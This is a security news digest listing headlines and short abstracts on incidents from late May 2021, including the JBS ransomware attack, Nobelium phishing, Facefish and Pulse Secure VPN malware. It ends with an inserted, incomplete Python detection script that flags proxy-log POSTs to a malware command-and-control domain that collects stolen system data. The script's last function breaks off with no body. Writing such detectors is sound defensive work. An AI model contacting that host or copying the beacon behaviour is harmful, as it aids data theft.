
May 2021

May 31, 2021 – Outage

Global meat processor JBS shuts part of operation to blunt cyberattack fallout Full Text

Abstract The company confirmed that the incident could impact customers and the supply chain, in the latest attack to target critical infrastructure.

SCMagazine

May 31, 2021 – Attack

Swedish Health Agency discloses hacking attempts Full Text

Abstract The Swedish Public Health Agency shut down the country's infectious diseases database, SmiNet, last week after multiple hacking attempts. The Swedish Public Health Agency was forced to shut down its infectious diseases database, named SmiNet,...

Security Affairs

May 31, 2021 – Government

Denmark intel helped US NSA to spy on European politicians Full Text

Abstract Denmark’s foreign secret service allowed the US NSA to spy on European politicians through a Danish telecommunications hub. Journalists from Danish broadcaster DR recently received a document titled the Dunhammer Report, which included the findings...

Security Affairs

May 31, 2021 – Attack

Swedish Health Agency shuts down SmiNet after hacking attempts Full Text

Abstract The Swedish Public Health Agency has shut down SmiNet, the country's infectious diseases database, on Thursday after it was targeted in several hacking attempts.

BleepingComputer

May 31, 2021 – Policy and Law

Fighting, screaming as alleged ATM scammer known as ‘The Shark’ is arrested in Mexico Full Text

Abstract Law enforcement authorities in Mexico arrested the alleged head of a financial fraud operation that used infected ATMs to steal more than $1 billion from tourists in recent years.

Cyberscoop

May 31, 2021 – Government

Biden budget seeks $750 million to respond to SolarWinds compromises, plus billions more for cyber Full Text

Abstract President Joe Biden’s fiscal 2022 budget blueprint released Friday proposes $750m for the federal government to implement lessons learned from the SolarWinds hack that compromised nine agencies.

Cyberscoop

May 31, 2021 – Breach

US nuclear weapon bunker security secrets spill from online flashcards since 2013 Full Text

Abstract The leak was revealed by investigative journalism website Bellingcat, which described the findings after “simply searching online for terms publicly known to be associated with nuclear weapons.”

The Register

May 31, 2021 – Malware

Using Fake Reviews to Find Dangerous Extensions – Krebs on Security Full Text

Abstract Leaving aside the extensions which are outright fraudulent, so many legitimate extensions get abandoned or sold each year to shady marketers that it's wise to trust only actively maintained extensions.

Krebs on Security

May 31, 2021 – Phishing

Phishing for Credentials: New Tactics as COVID’s Grip Eases Full Text

Abstract The Cofense Phishing Defense Center (PDC) has observed a phishing campaign that attempts to gather login credentials from employees by acting as the Chief Information Officer (CIO).

Cofense

May 31, 2021 – Solution

Deadshot: Open source DevOps tool stops sensitive data from being uploaded to GitHub Full Text

Abstract Deadshot monitors GitHub pull requests in real-time. The open-source tool flags the potential inclusion of sensitive data in any code, as well as “changes to sensitive functionality”.

The Daily Swig

May 31, 2021 – Outage

Food giant JBS Foods shuts down production after cyberattack Full Text

Abstract JBS Foods, a leading food company and the largest meat producer globally, was forced to shut down production at multiple sites worldwide following a cyberattack.

BleepingComputer

May 31, 2021 – Government

US Says Agencies Largely Fended Off Latest Russian Hack Full Text

Abstract Officials described the cyberattack as “basic phishing” in which hackers used malware-laden emails to target the systems of U.S. and foreign government agencies, think tanks, and humanitarian groups.

Security Week

May 31, 2021 – Vulnerabilities

SonicWall Patches Command Injection Flaw in Firewall Management Application Full Text

Abstract Tracked as CVE-2021-20026 and featuring a CVSS score of 8.8, the recently patched vulnerability impacts on-premises versions of SonicWall NSM, but does not affect NSM SaaS versions.

Security Week

May 31, 2021 – Vulnerabilities

PoC published for new Microsoft PatchGuard (KPP) bypass Full Text

Abstract A security researcher has discovered a bug in PatchGuard, a crucial Windows security feature, that can allow threat actors to load unsigned (malicious) code into the Windows operating system kernel.

The Record

May 31, 2021 – Outage

Suspected Ransomware Attack Leads to Downtime at JBS Meat Processing Full Text

Abstract The world's largest meat processing company, JBS Foods, has fallen victim to cyber attacks that have shut down production around the world, including in North America, South America, and Australia.

Cybersecurity Insiders

May 31, 2021 – Privacy

Your Amazon Devices to Automatically Share Your Wi-Fi With Neighbors Full Text

Abstract Starting June 8, Amazon will automatically enable a feature on your Alexa, Echo, or other Amazon device that will share some of your Internet bandwidth with your neighbors—unless you choose to opt out. Amazon intends to register its family of hardware devices that are operational in the U.S.—including Echo speakers, Ring Video Doorbells, Ring Floodlight Cams, and Ring Spotlight Cams—into Sidewalk as it readies to roll out the shared mesh network in the country next week. Initially announced in September 2019, Sidewalk is part of Amazon's efforts to build a long-range wireless network that leverages Bluetooth, 900 MHz spectrum (FSK), and other frequencies to help Echo, Ring, Tile trackers and other Sidewalk-enabled devices communicate over the internet without Wi-Fi. Amazon is expected to flip the switch on Sidewalk in the U.S. for all capable devices by default come June 8, co-opting millions of devices into the network and providing near-ubiquitous connect

The Hacker News

May 31, 2021 – Vulnerabilities

Experts devised a new attack to bypass Microsoft PatchGuard Full Text

Abstract A security researcher discovered a bug in the PatchGuard Windows security feature that can allow loading unsigned malicious code into the Windows kernel. Japanese researcher Kento Oki has discovered a bug in PatchGuard that could be exploited by an attacker...

Security Affairs

May 31, 2021 – Malware

Facefish Backdoor delivers rootkits to Linux x64 systems Full Text

Abstract Experts from Qihoo 360 NETLAB published details about a new backdoor, dubbed Facefish, which can be used by threat actors to steal login credentials and execute arbitrary commands on Linux systems.

Security Affairs

May 31, 2021 – General

Can Your Business Email Be Spoofed? Check Your Domain Security Now! Full Text

Abstract Are you aware of how secure your domain is? In most organizations, there is an assumption that their domains are secure, but within a few months the truth dawns on them that they aren't. Spotting someone spoofing your domain name is one way to determine if your security is unsatisfactory - this means that someone is impersonating you (or confusing some of your recipients) and releasing false information. You may ask, "But why should I care?" Because these spoofing activities can potentially endanger your reputation. With so many companies being targeted by domain impersonators, email domain spoofing shouldn't be taken lightly. By doing so, they could put themselves, as well as their clients, at risk. Your domain's security rating can make a huge difference in whether or not you get targeted by phishers looking to make money quickly or to use your domain and brand to spread ransomware without you knowing it! Check your domain's security rating with

The Hacker News

May 31, 2021 – Attack

How Ransomware Adversaries Reacted to the DarkSide Attack Full Text

Abstract CrowdStrike researchers attribute the operation of the DarkSide RaaS to CARBON SPIDER, a skilled eCrime (ECX) group that is highly likely Eastern Europe- or Russia-based.

Crowdstrike

May 31, 2021 – Malware

Fake Streaming Service Spreads BazarLoader Full Text

Abstract Scammers have noted how subscriptions to online streaming services during the COVID-19 pandemic have skyrocketed. Proofpoint researchers expose a malspam campaign using a fake movie streaming service called BravoMovies.

Cyware Alerts - Hacker News

May 31, 2021 – Hacker

Steal Web Session Cookies From Facebook in Chrome Full Text

Abstract Cookies are simply small pieces of data that the web browser uses for a better web surfing experience. Cookies are stored in memory and on the hard drive of users' computers.

GB Hackers

May 31, 2021 – Malware

Agrius Masquerades as Ransomware in Attacks Against Israel Full Text

Abstract Experts stumbled across a new threat actor that uses data-wiping malware to disrupt its victims’ IT infrastructure and demands a ransom while posing as a ransomware actor. It is focusing its attacks on a variety of organizations based in the Middle East.

Cyware Alerts - Hacker News

May 31, 2021 – Skimming

WooCommerce Credit Card Skimmer Hides in Plain Sight Full Text

Abstract The attackers use what appears to be a Google Tag Manager script, a popular service used on many websites, to hide their malicious content, while using base64 encoding for obfuscation.

Sucuri

May 31, 2021 – Skimming

MobileInter: A Popular Magecart Skimmer Redesigned For Your Phone Full Text

Abstract With nearly three out of every four dollars spent online done via a mobile device, it's no wonder Magecart operators are looking to target this lucrative landscape using MobileInter.

Risk IQ

May 31, 2021 – Vulnerabilities

A New Bug in Siemens PLCs Could Let Hackers Run Malicious Code Remotely Full Text

Abstract Siemens on Friday shipped firmware updates to address a severe vulnerability in SIMATIC S7-1200 and S7-1500 programmable logic controllers (PLCs) that could be exploited by a malicious actor to remotely gain access to protected areas of the memory and achieve unrestricted and undetected code execution, in what the researchers describe as an attacker's "holy grail." The memory protection bypass vulnerability, tracked as CVE-2020-15782 (CVSS score: 8.1), was discovered by operational technology security company Claroty by reverse-engineering the MC7 / MC7+ bytecode language used to execute PLC programs in the microprocessor. There's no evidence that the weakness was abused in the wild. In an advisory issued by Siemens, the German industrial automation firm said an unauthenticated, remote attacker with network access to TCP port 102 could potentially write arbitrary data and code to protected memory areas or read sensitive data to launch further attacks. "Achie

The Hacker News

May 31, 2021 – Attack

DeepSloth: An Adversarial Attack on Machine Learning Systems Full Text

Abstract Scientists working at the University of Maryland developed a new adversarial attack that can force machine learning systems to slow down and cause critical failures. Although this technique is not yet harmful, more such devastating slowdown attacks can be discovered in the future.

Cyware Alerts - Hacker News

May 31, 2021 – Phishing

COVID-19 – Phishing attacks target employees that come back to the office Full Text

Abstract Hackers are attempting to exploit the return to the "new normal" as governments remove the restrictions imposed in response to COVID-19. The number of COVID-19 infections is decreasing in many countries and some governments are reducing...

Security Affairs

May 30, 2021 – General

Watch out: These unsubscribe emails only lead to further spam Full Text

Abstract Scammers use fake 'unsubscribe' spam emails to confirm valid email accounts to be used in future phishing and spam campaigns.

BleepingComputer

May 30, 2021 – Government

New Russian hacks spark calls for tougher Biden actions Full Text

Abstract Officials are calling for harsher measures against Russia following Microsoft’s assessment that the hackers behind the devastating SolarWinds hack were continuing to launch cyberattacks against U.S. government agencies and other organizations.

The Hill

May 30, 2021 – Criminals

Interpol has intercepted $83 million from financial cyber crimes Full Text

Abstract Interpol has intercepted $83 million in illicit funds transferred from victims to the accounts used by crooks. An operation conducted by Interpol, codenamed HAECHI-I, was carried out by more than 40 officers in the Asia Pacific region over a six-month period...

Security Affairs

May 30, 2021 – Criminals

Interpol intercepts $83 million fighting financial cyber crime Full Text

Abstract The INTERPOL (short for International Criminal Police Organisation) has intercepted $83 million belonging to victims of online financial crime from being transferred to the accounts of their attackers.

BleepingComputer

May 30, 2021 – Attack

These 2 attacks allow altering certified PDF documents Full Text

Abstract Researchers disclosed two new attack techniques that allow modifying visible content on certified PDF documents without invalidating the digital signature. Researchers from Ruhr-University Bochum have disclosed two new attack techniques, dubbed Evil...

Security Affairs

May 30, 2021 – General

Security Affairs newsletter Round 316 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. A malware attack hit the Alaska Health Department; CVE-2021-31166 Windows HTTP flaw also impacts...

Security Affairs

May 30, 2021 – Malware

Facefish Backdoor delivers rootkits to Linux x64 systems Full Text

Abstract Qihoo 360 NETLAB spotted a new backdoor dubbed Facefish that could allow attackers to take over Linux systems and steal sensitive data. Cybersecurity experts from Qihoo 360 NETLAB published details about a new backdoor, dubbed Facefish, which can be used...

Security Affairs

May 29, 2021 – Phishing

Beware: Walmart phishing attack says your package was not delivered Full Text

Abstract A Walmart phishing campaign is underway that attempts to steal your personal information and verifies your email for further phishing attacks.

BleepingComputer

May 29, 2021 – Hacker

Microsoft: Russian hackers used 4 new malware in USAID phishing Full Text

Abstract Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).

BleepingComputer

May 29, 2021 – Ransomware

New Epsilon Red ransomware hunts unpatched Microsoft Exchange servers Full Text

Abstract A new ransomware threat calling itself Red Epsilon has been seen leveraging Microsoft Exchange server vulnerabilities to encrypt machines across the network.

BleepingComputer

May 29, 2021 – Government

FBI will share compromised passwords with HIBP Pwned Passwords Full Text

Abstract The FBI is going to share compromised passwords discovered during investigations with Have I Been Pwned (HIBP)'s 'Pwned Passwords' service. The FBI will share compromised passwords that were discovered during investigations with the 'Pwned Passwords'...

Security Affairs

May 29, 2021 – Malware

Secure Search is a Browser Hijacker – How to Remove it Now? Full Text

Abstract Secured Search is a browser hijacker that changes your browser's settings to promote securedsearch.com, let's remove it. Secured Search is the same piece of software as ByteFence Secure Browsing. It's supposedly a tool that improves browsing security...

Security Affairs

May 29, 2021 – Hacker

The Bizarro Streaming Site That Hackers Built From Scratch Full Text

Abstract The BravoMovies campaign, spotted by researchers at security firm ProofPoint, has been around since at least early May. While many of its elements seem absurd at a glance, it shows just how far hackers are willing to go to ensnare their victims.

Wired

May 29, 2021 – Hacker

Researchers Demonstrate 2 New Hacks to Modify Certified PDF Documents Full Text

Abstract Cybersecurity researchers have disclosed two new attack techniques on certified PDF documents that could potentially enable an attacker to alter a document's visible content by displaying malicious content over the certified content without invalidating its signature. "The attack idea exploits the flexibility of PDF certification, which allows signing or adding annotations to certified documents under different permission levels," said researchers from Ruhr-University Bochum, who have systematically analyzed the security of the PDF specification over the years. The findings were presented at the 42nd IEEE Symposium on Security and Privacy (IEEE S&P 2021) held this week. The two attacks — dubbed Evil Annotation and Sneaky Signature attacks — hinge on manipulating the PDF certification process by exploiting flaws in the specification that governs the implementation of digital signatures (aka approval signature) and its more flexible variant called certifica

The Hacker News

May 29, 2021 – Vulnerabilities

SonicWall fixes an NSM On-Prem bug, patch it asap! Full Text

Abstract SonicWall urges customers to address a post-authentication flaw that affects on-premises versions of the Network Security Manager (NSM). SonicWall urges customers to 'immediately' address a post-authentication vulnerability, tracked as CVE-2021-20026,...

Security Affairs

May 29, 2021 – Vulnerabilities

SonicWall fixes an NSM On-Prem bug, patch it asap! Full Text

Abstract SonicWall urged customers to ‘immediately’ address a post-authentication vulnerability, tracked as CVE-2021-20026, impacting on-premises versions of the Network Security Manager (NSM).

Security Affairs

May 29, 2021 – Government

Biden budget sets aside $750 million for SolarWinds response Full Text

Abstract U.S. President Joe Biden’s proposed budget includes $750 million for the government agencies hit by the SolarWinds hack to pay for cybersecurity improvements to prevent another attack.

Reuters

May 29, 2021 – Vulnerabilities

Siemens Patches Major PLC Flaw that Bypasses Its ‘Sandbox’ Protection Full Text

Abstract Researchers published details on a serious vulnerability they found in Siemens SIMATIC S7-1200 and S7-1500 PLCs that could allow an attacker to gain remote access to protected memory areas of the popular programmable logic controllers.

Dark Reading

May 29, 2021 – APT

Chinese APT Groups Continue to Pound Away on Pulse Secure VPNs Full Text

Abstract Multiple threat groups believed to be working in support of China's long-term economic interests are continuing to hammer away at networks belonging to organizations in the US and Europe.

Dark Reading

May 29, 2021 – Vulnerabilities

Apple Patches Flaw That Allows Sneaky Screenshots Full Text

Abstract Apple’s Big Sur 11.4 patches a security flaw that could be exploited to take screenshots, record audio and video, and access files on someone else’s Mac without their knowing.

Avast

May 28, 2021 – Hacker

Microsoft: Russian SVR hackers target govt agencies from 24 countries Full Text

Abstract The Microsoft Threat Intelligence Center (MSTIC) has discovered that the Russian-backed hackers behind the SolarWinds supply-chain attack are now coordinating an ongoing phishing campaign targeting government agencies worldwide.

BleepingComputer

May 28, 2021 – General

Hillicon Valley: Facebook to resume some political donations | Microsoft says Russian hackers utilized email system used by USAID to target other groups | Senate confirms Biden’s top scientist Full Text

Abstract Facebook said it’s resuming political donations after pausing in the wake of the Capitol insurrection, but will keep the ban in place for Republicans who voted against certifying the results of the election. Meanwhile, Microsoft said Russian hackers utilized an email system used by the State Department to target other organizations, and the Senate confirmed President Biden’s top scientist after he faced pushback over some controversial comments and past meetings.

The Hill

May 28, 2021 – Government

Biden budget includes $750M to help agencies recover from SolarWinds hack in proposed budget Full Text

Abstract President Biden’s proposed budget for the upcoming fiscal year includes $750 million to address the ongoing fallout from the SolarWinds hack, even as lawmakers continue to press the administration to include more funding for a key cyber agency. 

The Hill

May 28, 2021 – Vulnerabilities

‘OMG it’s a bug!’ Beware the bells and whistles around vulnerability disclosures Full Text

Abstract A vulnerability disclosure shows how splashy websites, catchy names and a healthy dose of FUD can make any vulnerability sound scary.

SCMagazine

May 28, 2021 – General

Have I Been Pwned teams with FBI, gives open-source access to code Full Text

Abstract The FBI will provide breached passwords to Have I Been Pwned when they are discovered during investigations, in an effort to better inform victims of cybercrime of compromise.

SCMagazine

May 28, 2021 – Vulnerabilities

CVE-2020-15782 flaw in Siemens PLCs allows remote hack Full Text

Abstract Industrial cybersecurity firm Claroty discovered a new flaw in Siemens PLCs that can be exploited by a remote and unauthenticated attacker to hack the devices. Researchers at industrial cybersecurity firm Claroty have discovered a high-severity vulnerability...

Security Affairs

May 28, 2021 – Covid-19

Hackers Exploit Post-COVID Return to Offices Full Text

Abstract Spoofed CIO ‘pandemic guideline’ emails being used to steal credentials.

Threatpost

May 28, 2021 – Attack

Myths versus reality: Three takeaways from the Colonial Pipeline attack Full Text

Abstract Some saw Colonial Pipeline as a typical ransomware attack, albeit on a vulnerable target. Others saw this as reflective of weaknesses in the security posture of the nation’s critical infrastructure. And others felt the incident showcased inadequacies in the existing framework for public-private partnership. Here we offer a rundown of some notable characteristics and outcomes.

SCMagazine

May 28, 2021 – Government

CISA-FireEye: 16 malware families from China infect Pulse Secure VPN appliances Full Text

Abstract FireEye Mandiant, working in tandem with the Cybersecurity and Infrastructure Security Agency and Ivanti, reported details of 16 malware families exclusively designed to infect Ivanti Pulse Connect Secure VPN appliances, and used by several cyber espionage groups believed to be affiliated with the Chinese government. The blog post by Mandiant was an update to the…

SCMagazine

May 28, 2021 – Attack

SolarWinds attackers leveraged trust in Constant Contact email marketing, USAID, to launch campaign Full Text

Abstract Using a hijacked Constant Contact email marketing account of USAID, the adversaries sent phishing emails to roughly 3,000 accounts at more than 150 different organizations. About 25 percent of these targets were international development, humanitarian and human rights organizations.

SCMagazine

May 28, 2021 – Government

FBI Issues Fortinet Flash Warning Full Text

Abstract FBI: APT actors exploiting Fortinet vulnerabilities to gain access for malicious activity

Infosecurity Magazine

May 28, 2021 – Ransomware

It’s Time We Talk About JSWorm Ransomware Full Text

Abstract First discovered in 2019, the JSWorm ransomware gained infamy under several other names such as Nemty, Offwhite, and Nefilim, among others.

Cyware Alerts - Hacker News

May 28, 2021 – Policy and Law

US Jails Telemarketing Fraudster Full Text

Abstract Federal prison for fraudster who tricked Americans into thinking their computers were under attack

Infosecurity Magazine

May 28, 2021 – Denial Of Service

Mexico walls off national lottery sites after ransomware DDoS threat Full Text

Abstract Access to Mexico's Lotería Nacional and Pronósticos lottery websites is now blocked for IP addresses outside of Mexico after a ransomware gang threatened to perform denial of service attacks.

BleepingComputer

May 28, 2021 – Government

FBI Issues Flash Alert Against Conti Ransomware Full Text

Abstract The FBI has identified at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, such as emergency medical services, law enforcement agencies, municipalities, and 911 dispatch centers.

Cyware Alerts - Hacker News

May 28, 2021 – Phishing

SolarWinds Hackers Go Phishing Full Text

Abstract Microsoft: Nobelium is targeting governments, NGOs and think tanks with phishing campaign

Infosecurity Magazine

May 28, 2021 – Business

Salesforce Leads $120 Million Round in Israeli Cyber Startup Wiz Full Text

Abstract Salesforce led a new funding round in Wiz, according to a person familiar with the matter. Existing investors include Greenoaks Capital, Advent International, Sequoia, and Insight Partners.

Yahoo! Finance

May 28, 2021 – Malware

Chinese cyberspies are targeting US, EU orgs with new malware Full Text

Abstract Chinese threat groups continue to deploy new malware strains on the compromised network of dozens of US and EU organizations after exploiting vulnerable Pulse Secure VPN appliances.

BleepingComputer

May 28, 2021 – General

Pharma Sector Increasingly Susceptible to Ransomware Attacks Full Text

Abstract More than 12% of pharmaceutical vendors are susceptible to suffering a ransomware attack, according to a survey by Black Kite. The average cost of cyberattacks on pharma companies per year is $31.1 million.

Cyware Alerts - Hacker News

May 28, 2021 – Vulnerabilities

SonicWall urges customers to ‘immediately’ patch NSM On-Prem bug Full Text

Abstract SonicWall urges customers to 'immediately' patch a post-authentication vulnerability impacting on-premises versions of the Network Security Manager (NSM) multi-tenant firewall management solution.

BleepingComputer

May 28, 2021 – Business

SAM Seamless Snags $20M Series B As Network Threats Grow Full Text

Abstract Israel-based SAM Seamless Network raised a $20 million Series B as the cybersecurity company readies itself for the perfect storm of an expanding network attack surface and the coming of 5G.

CrunchBase News

May 28, 2021 – Breach

Russian hackers seized email system used by State Department aid agency, human rights groups Full Text

Abstract Russian hackers seized the email system used by the State Department’s international agency and other human rights groups, Microsoft announced.

The Hill

May 28, 2021 – Malware

Researchers Warn of Facefish Backdoor Spreading Linux Rootkits Full Text

Abstract Cybersecurity researchers have disclosed a new backdoor program capable of stealing user login credentials and device information and executing arbitrary commands on Linux systems. The malware dropper has been dubbed "Facefish" by the Qihoo 360 NETLAB team owing to its capability to deliver different rootkits at different times and its use of the Blowfish cipher to encrypt communications to the attacker-controlled server. "Facefish consists of 2 parts, Dropper and Rootkit, and its main function is determined by the Rootkit module, which works at the Ring 3 layer and is loaded using the LD_PRELOAD feature to steal user login credentials by hooking ssh/sshd program related functions, and it also supports some backdoor functions," the researchers said. The NETLAB research builds on a previous analysis published by Juniper Networks on April 26, which documented an attack chain targeting Control Web Panel (CWP, formerly CentOS Web Panel) to inject an SSH implant wit

The Hacker News

May 28, 2021 – General

Cyber Pros to Take Part in Charity Challenge to Help Fight Online Crime Full Text

Abstract The challenge will see 25 infosec pros walk 19,000 miles over the next six months

Infosecurity Magazine

May 28, 2021 – APT

China-linked APT groups target orgs via Pulse Secure VPN devices Full Text

Abstract Researchers from FireEye warn that China-linked APT groups continue to target Pulse Secure VPN devices to compromise networks. Cybersecurity researchers from FireEye warn once again that Chinese APT groups continue to target Pulse Secure VPN devices...

Security Affairs

May 28, 2021 – Vulnerabilities

HPE Fixes Critical Zero-Day in Server Management Software Full Text

Abstract The bug in HPE SIM makes it easy as pie for attackers to remotely trigger code, no user interaction necessary.

Threatpost

May 28, 2021 – Ransomware

Ransomware gangs’ slow decryptors prompt victims to seek alternatives Full Text

Abstract Recently, two highly publicized ransomware victims received a decryptor that was too slow to make it effective in quickly restoring the victim's network.

BleepingComputer

May 28, 2021 – Business

DataDome raises $35M to defend ecommerce from bot attacks Full Text

Abstract Bot defense startup DataDome today announced it has raised $35 million in a Series B round led by Elephant. It aims to use the funds to invest in R&D as it looks to expand its customer base.

Venture Beat

May 28, 2021 – Policy and Law

Khanna, Mace introduce bill to strengthen federal cyber workforce following major hacks Full Text

Abstract Reps. Ro Khanna (D-Calif.) and Nancy Mace (R-S.C.) on Friday introduced legislation to strengthen the federal workforce in the wake of a year of escalating cyber threats and attacks.

The Hill

May 28, 2021 – Criminals

SolarWinds Hackers Target Think Tanks With New ‘NativeZone’ Backdoor Full Text

Abstract Microsoft on Thursday disclosed that the threat actor behind the SolarWinds supply chain hack returned to the threat landscape to target government agencies, think tanks, consultants, and non-governmental organizations located across 24 countries, including the U.S. "This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations," Tom Burt, Microsoft's Corporate Vice President for Customer Security and Trust, said. "At least a quarter of the targeted organizations were involved in international development, humanitarian, and human rights work." Microsoft attributed the intrusions to the Russian threat actor it tracks as Nobelium, known to the wider cybersecurity community under the monikers APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), and Dark Halo (Volexity). The latest wave in a series of intrusions is said to have begun on Jan. 28, 2021, before reaching a new level of escalat

The Hacker News

May 28, 2021 – General

NCSC: Act Now to Protect Streaming Accounts Full Text

Abstract Automatic updates and password changes are required

Infosecurity Magazine

May 28, 2021 – Phishing

Microsoft details new sophisticated spear-phishing attacks from NOBELIUM Full Text

Abstract Microsoft experts uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind SolarWinds hack. Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign conducted by NOBELIUM...

Security Affairs

May 28, 2021 – General

Building Multilayered Security for Modern Threats Full Text

Abstract Justin Jett, director of audit and compliance for Plixer, discusses the elements of a successful advanced security posture.

Threatpost

May 28, 2021 – Criminals

Microsoft: SolarWinds hackers target govt agencies from 24 countries Full Text

Abstract The Microsoft Threat Intelligence Center (MSTIC) has discovered that the Russian-based SolarWinds hackers are behind an ongoing phishing campaign targeting government agencies worldwide.

BleepingComputer

May 28, 2021 – Ransomware

New Golang-based Epsilon Red Ransomware Leverages PowerShell Scripts for Malicious Objectives Full Text

Abstract The malware was delivered as the final executable payload in a hand-controlled attack against a US-based business in the hospitality industry, with early-stage components in the form of PowerShell scripts.

Sophos

May 28, 2021 – Hacker

Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices Full Text

Abstract Cybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells and exfiltrate sensitive information from enterprise networks. FireEye's Mandiant threat intelligence team, which is tracking the cyberespionage activity under two threat clusters UNC2630 and UNC2717, said the intrusions line up with key Chinese government priorities, adding "many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent 14th Five Year Plan." On April 20, the cybersecurity firm disclosed 12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by several cyberespionage groups believed to be affiliated with the Chinese government. UNC263

The Hacker News

May 28, 2021 – General

Alert Overload Distressing 70% of SecOps Teams Full Text

Abstract Stress leads many to walk away from their computer or switch off alerts

Infosecurity Magazine

May 28, 2021 – Attack

Canada Post disclosed a ransomware attack on a third-party service provider Full Text

Abstract Canada Post disclosed a ransomware attack on a third-party service provider that exposed shipping information for their customers. Canada Post announced that a ransomware attack on a third-party service provider exposed shipping information for their...

Security Affairs

May 28, 2021 – Government

FBI to share compromised passwords with Have I Been Pwned Full Text

Abstract The FBI will soon begin sharing compromised passwords discovered during law enforcement investigations with Have I Been Pwned's 'Pwned Passwords' service.

BleepingComputer

May 28, 2021 – APT

Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices Full Text

Abstract Mandiant identified 16 malware families exclusively designed to infect Pulse Secure VPN appliances and used by several cyberespionage groups which are believed to be linked to the Chinese government.

FireEye

May 28, 2021 – General

Three-Quarters of Infosec Pros Concerned About Next SolarWinds Full Text

Abstract Supply chain risk a major worry, finds Infosecurity Europe poll

Infosecurity Magazine

May 28, 2021 – APT

Microsoft Suspects Russia’s Cozy Bear APT Behind Attack Against U.S. Aid Agency Full Text

Abstract By breaching the systems of a supplier used by the federal government, the hackers sent out genuine-looking emails to more than 3,000 accounts across more than 150 organizations linked to USAID.

New York Times

May 28, 2021 – General

Token Resistance: Tackling the New NFT Threat Landscape Full Text

Abstract Beyond the massive cost for many of these crypto tokens, there’s also the issue of theft; if accounts are compromised and NFTs stolen, they could be sold to the highest bidder.

Security Intelligence

May 27, 2021 – Breach

Canada Post hit by data breach after supplier ransomware attack Full Text

Abstract Canada Post has informed 44 of its large commercial customers that a ransomware attack on a third-party service provider exposed shipping information for their customers.

BleepingComputer

May 27, 2021 – Criminals

How North Korean Threat Actors Pulled Off Multimillion-Dollar Heists? Full Text

Abstract ClearSky attributed multiple attacks on cryptocurrency exchanges to a threat actor, dubbed CryptoCore, and linked its activities with Lazarus. It swindled hundreds of millions of dollars from the U.S., Israel, Europe, and Japan over the past three years.

Cyware Alerts - Hacker News

May 27, 2021 – General

Hillicon Valley: TSA formally directs pipeline companies to report cybersecurity incidents in wake of Colonial attack | Tech trade groups sue Florida over new social media law Full Text

Abstract The Transportation Security Administration issued a security directive Thursday to strengthen federal cybersecurity oversight of pipelines following the attack on the Colonial Pipeline. Meanwhile, the Senate Judiciary antitrust subcommittee announced a series of hearings slated for the summer, and tech trade groups are suing Florida over a bill that aims to prohibit social media companies from banning politicians. 

The Hill

May 27, 2021 – Malware

Malvertising Campaign On Google Distributed Trojanized AnyDesk Installer Full Text

Abstract Cybersecurity researchers on Wednesday publicized the disruption of a "clever" malvertising network targeting AnyDesk that delivered a weaponized installer of the remote desktop software via rogue Google ads that appeared in the search engine results pages. The campaign, which is believed to have begun as early as April 21, 2021, involves a malicious file that masquerades as a setup executable for AnyDesk (AnyDeskSetup.exe), which, upon execution, downloads a PowerShell implant to amass and exfiltrate system information. "The script had some obfuscation and multiple functions that resembled an implant as well as a hardcoded domain (zoomstatistic[.]com) to 'POST' reconnaissance information such as user name, hostname, operating system, IP address and the current process name," researchers from CrowdStrike said in an analysis. AnyDesk's remote desktop access solution has been downloaded by more than 300 million users worldwide, according to the co
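As an added example (not code from the CrowdStrike analysis or from The Hacker News), the check below runs a constructed set of web-proxy log lines against the hardcoded domain quoted above and flags the outbound POSTs that the implant's reconnaissance beacon would produce. Only zoomstatistic[.]com comes from the text; the log format, client addresses, URL paths and user agents are assumptions made for the demonstration.

```python
import re
from urllib.parse import urlsplit

# IOC as published (defanged). Kept defanged in the list so it cannot be
# clicked or resolved by accident; refang() turns it into a matchable host.
IOC_DOMAINS = ["zoomstatistic[.]com"]

# Constructed proxy log lines for the demonstration (not real telemetry).
# Assumed format: timestamp client method url status "user-agent"
SAMPLE_PROXY_LOG = [
    '2021-04-22T09:14:03Z 10.1.4.22 GET https://anydesk.com/en/downloads 200 "Mozilla/5.0"',
    '2021-04-22T09:16:51Z 10.1.4.22 POST https://zoomstatistic.com/api/stats 200 "Mozilla/5.0 (Windows NT; PowerShell)"',
    '2021-04-22T09:17:02Z 10.1.4.22 POST https://cdn.zoomstatistic.com/upload 200 "Mozilla/5.0"',
    '2021-04-22T09:18:30Z 10.1.4.40 POST https://zoom.us/j/123 200 "Mozilla/5.0"',
]

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def refang(domain: str) -> str:
    """Undo the usual defanging conventions: [.] / (.) for dots, hxxp for http."""
    return domain.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http").lower()


def host_matches(host: str, ioc: str) -> bool:
    """Exact match or a subdomain of the IOC; 'notzoomstatistic.com' must not match."""
    return host == ioc or host.endswith("." + ioc)


def parse_line(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None  # unparseable lines are skipped, not silently matched
    ts, client, method, url, status, ua = m.groups()
    return {"ts": ts, "client": client, "method": method.upper(), "url": url,
            "host": (urlsplit(url).hostname or "").lower(), "status": int(status), "ua": ua}


def find_ioc_hits(lines):
    """Return every request to an IOC domain, noting POSTs as likely beacons."""
    iocs = [refang(d) for d in IOC_DOMAINS]
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for ioc in iocs:
            if host_matches(rec["host"], ioc):
                rec["ioc"] = ioc
                rec["note"] = ("POST to IOC domain: matches the implant's reconnaissance upload"
                               if rec["method"] == "POST" else "request to IOC domain")
                hits.append(rec)
                break
    return hits


def clients_by_hit_count(hits):
    """Which internal hosts talked to the IOC, and how often: the triage starting point."""
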